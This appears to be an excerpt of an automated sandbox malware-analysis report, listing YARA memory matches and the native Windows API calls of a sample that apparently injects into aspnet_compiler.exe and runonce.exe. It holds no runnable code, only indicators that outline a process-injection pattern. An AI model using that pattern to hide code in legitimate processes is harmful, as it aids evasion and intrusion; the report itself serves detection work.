                Source: Yara matchFile source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: uI1A364y2P.exe, -Module-.csLarge array initialization: _003CModule_003E: array initializer size 74016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0042CAA3 NtClose,4_2_0042CAA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2B60 NtClose,LdrInitializeThunk,4_2_017A2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_017A2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017A2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A35C0 NtCreateMutant,LdrInitializeThunk,4_2_017A35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A4340 NtSetContextThread,4_2_017A4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A4650 NtSuspendThread,4_2_017A4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2BF0 NtAllocateVirtualMemory,4_2_017A2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2BE0 NtQueryValueKey,4_2_017A2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2BA0 NtEnumerateValueKey,4_2_017A2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2B80 NtQueryInformationFile,4_2_017A2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2AF0 NtWriteFile,4_2_017A2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2AD0 NtReadFile,4_2_017A2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2AB0 NtWaitForSingleObject,4_2_017A2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2D30 NtUnmapViewOfSection,4_2_017A2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2D10 NtMapViewOfSection,4_2_017A2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2D00 NtSetInformationFile,4_2_017A2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2DD0 NtDelayExecution,4_2_017A2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2DB0 NtEnumerateKey,4_2_017A2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2C60 NtCreateKey,4_2_017A2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2C00 NtQueryInformationProcess,4_2_017A2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2CF0 NtOpenProcess,4_2_017A2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2CC0 NtQueryVirtualMemory,4_2_017A2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2CA0 NtQueryInformationToken,4_2_017A2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2F60 NtCreateProcessEx,4_2_017A2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2F30 NtCreateSection,4_2_017A2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2FE0 NtCreateFile,4_2_017A2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2FB0 NtResumeThread,4_2_017A2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2FA0 NtQuerySection,4_2_017A2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2F90 NtProtectVirtualMemory,4_2_017A2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2E30 NtWriteVirtualMemory,4_2_017A2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2EE0 NtQueueApcThread,4_2_017A2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2EA0 NtAdjustPrivilegesToken,4_2_017A2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2E80 NtReadVirtualMemory,4_2_017A2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3010 NtOpenDirectoryObject,4_2_017A3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3090 NtSetValueKey,4_2_017A3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A39B0 NtGetContextThread,4_2_017A39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3D70 NtOpenThread,4_2_017A3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3D10 NtOpenProcessToken,4_2_017A3D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04604650 NtSuspendThread,LdrInitializeThunk,7_2_04604650
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04604340 NtSetContextThread,LdrInitializeThunk,7_2_04604340
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602C60 NtCreateKey,LdrInitializeThunk,7_2_04602C60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04602C70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04602CA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04602D30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04602D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04602DF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602DD0 NtDelayExecution,LdrInitializeThunk,7_2_04602DD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04602EE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04602E80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602F30 NtCreateSection,LdrInitializeThunk,7_2_04602F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602FE0 NtCreateFile,LdrInitializeThunk,7_2_04602FE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602FB0 NtResumeThread,LdrInitializeThunk,7_2_04602FB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602AF0 NtWriteFile,LdrInitializeThunk,7_2_04602AF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602AD0 NtReadFile,LdrInitializeThunk,7_2_04602AD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602B60 NtClose,LdrInitializeThunk,7_2_04602B60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04602BE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04602BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04602BA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046035C0 NtCreateMutant,LdrInitializeThunk,7_2_046035C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046039B0 NtGetContextThread,LdrInitializeThunk,7_2_046039B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602C00 NtQueryInformationProcess,7_2_04602C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602CF0 NtOpenProcess,7_2_04602CF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602CC0 NtQueryVirtualMemory,7_2_04602CC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602D00 NtSetInformationFile,7_2_04602D00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602DB0 NtEnumerateKey,7_2_04602DB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602E30 NtWriteVirtualMemory,7_2_04602E30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602EA0 NtAdjustPrivilegesToken,7_2_04602EA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602F60 NtCreateProcessEx,7_2_04602F60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602FA0 NtQuerySection,7_2_04602FA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602F90 NtProtectVirtualMemory,7_2_04602F90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602AB0 NtWaitForSingleObject,7_2_04602AB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602B80 NtQueryInformationFile,7_2_04602B80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603010 NtOpenDirectoryObject,7_2_04603010
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603090 NtSetValueKey,7_2_04603090
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603D70 NtOpenThread,7_2_04603D70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603D10 NtOpenProcessToken,7_2_04603D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379510 NtCreateFile,7_2_00379510
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379680 NtReadFile,7_2_00379680
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379780 NtDeleteFile,7_2_00379780
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379820 NtClose,7_2_00379820
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379980 NtAllocateVirtualMemory,7_2_00379980
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EF2CF NtReadVirtualMemory,7_2_043EF2CF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EF8C4 NtMapViewOfSection,7_2_043EF8C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182F43F4_2_0182F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182F7B04_2_0182F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B56304_2_017B5630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018216CC4_2_018216CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017799504_2_01779950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178B9504_2_0178B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018059104_2_01805910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DD8004_2_017DD800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017738E04_2_017738E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017ADBF94_2_017ADBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E5BF04_2_017E5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182FB764_2_0182FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178FB804_2_0178FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E3A6C4_2_017E3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01811AA34_2_01811AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180DAAC4_2_0180DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181DAC64_2_0181DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01827A464_2_01827A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182FA494_2_0182FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017B5AA04_2_017B5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01773D404_2_01773D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178FDC04_2_0178FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01821D5A4_2_01821D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01827D734_2_01827D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E9C324_2_017E9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182FCF24_2_0182FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182FFB14_2_0182FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182FF094_2_0182FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01771F924_2_01771F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01779EB04_2_01779EB0
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEF2DC6_2_03EEF2DC
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF134A6_2_03EF134A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF7B5A6_2_03EF7B5A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF7B556_2_03EF7B55
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEF33A6_2_03EEF33A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF99496_2_03EF9949
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF112A6_2_03EF112A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EF11216_2_03EF1121
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03F1012A6_2_03F1012A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEF4D36_2_03EEF4D3
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEF48A6_2_03EEF48A
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeCode function: 6_2_03EEF47E6_2_03EEF47E
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046824467_2_04682446
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046744207_2_04674420
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0467E4F67_2_0467E4F6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D05357_2_045D0535
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046905917_2_04690591
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045EC6E07_2_045EC6E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045F47507_2_045F4750
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D07707_2_045D0770
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045CC7C07_2_045CC7C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046620007_2_04662000
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046581587_2_04658158
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045C01007_2_045C0100
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0466A1187_2_0466A118
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046881CC7_2_046881CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046901AA7_2_046901AA
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046841A27_2_046841A2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046702747_2_04670274
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046502C07_2_046502C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468A3527_2_0468A352
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046903E67_2_046903E6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045DE3F07_2_045DE3F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D0C007_2_045D0C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045C0CF27_2_045C0CF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04670CB57_2_04670CB5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045DAD007_2_045DAD00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0466CD1F7_2_0466CD1F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045CADE07_2_045CADE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045E8DBF7_2_045E8DBF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D0E597_2_045D0E59
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468EE267_2_0468EE26
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468EEDB7_2_0468EEDB
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045E2E907_2_045E2E90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468CE937_2_0468CE93
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04644F407_2_04644F40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04612F287_2_04612F28
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04672F307_2_04672F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045F0F307_2_045F0F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045C2FC87_2_045C2FC8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045DCFE07_2_045DCFE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0464EFA07_2_0464EFA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045DA8407_2_045DA840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D28407_2_045D2840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045FE8F07_2_045FE8F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045B68B87_2_045B68B8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045E69627_2_045E6962
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0469A9A67_2_0469A9A6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D29A07_2_045D29A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045CEA807_2_045CEA80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468AB407_2_0468AB40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04686BD77_2_04686BD7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045C14607_2_045C1460
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468F43F7_2_0468F43F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046875717_2_04687571
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046995C37_2_046995C3
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0466D5B07_2_0466D5B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046156307_2_04615630
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046816CC7_2_046816CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468F7B07_2_0468F7B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046870E97_2_046870E9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468F0E07_2_0468F0E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D70C07_2_045D70C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0467F0CC7_2_0467F0CC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0469B16B7_2_0469B16B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0460516C7_2_0460516C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045BF1727_2_045BF172
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045DB1B07_2_045DB1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046712ED7_2_046712ED
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045EB2C07_2_045EB2C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D52A07_2_045D52A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045BD34C7_2_045BD34C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468132D7_2_0468132D
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0461739A7_2_0461739A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04649C327_2_04649C32
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468FCF27_2_0468FCF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04687D737_2_04687D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D3D407_2_045D3D40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04681D5A7_2_04681D5A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045EFDC07_2_045EFDC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D9EB07_2_045D9EB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468FF097_2_0468FF09
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D1F927_2_045D1F92
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468FFB17_2_0468FFB1
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0463D8007_2_0463D800
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D38E07_2_045D38E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045D99507_2_045D9950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045EB9507_2_045EB950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046659107_2_04665910
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04643A6C7_2_04643A6C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468FA497_2_0468FA49
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04687A467_2_04687A46
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0467DAC67_2_0467DAC6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04615AA07_2_04615AA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04671AA37_2_04671AA3
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0466DAAC7_2_0466DAAC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0468FB767_2_0468FB76
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04645BF07_2_04645BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0460DBF97_2_0460DBF9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_045EFB807_2_045EFB80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00361FD07_2_00361FD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035CE507_2_0035CE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035CE477_2_0035CE47
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035D0707_2_0035D070
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035B0607_2_0035B060
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035B1B07_2_0035B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035B1A47_2_0035B1A4
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_0035B1F97_2_0035B1F9
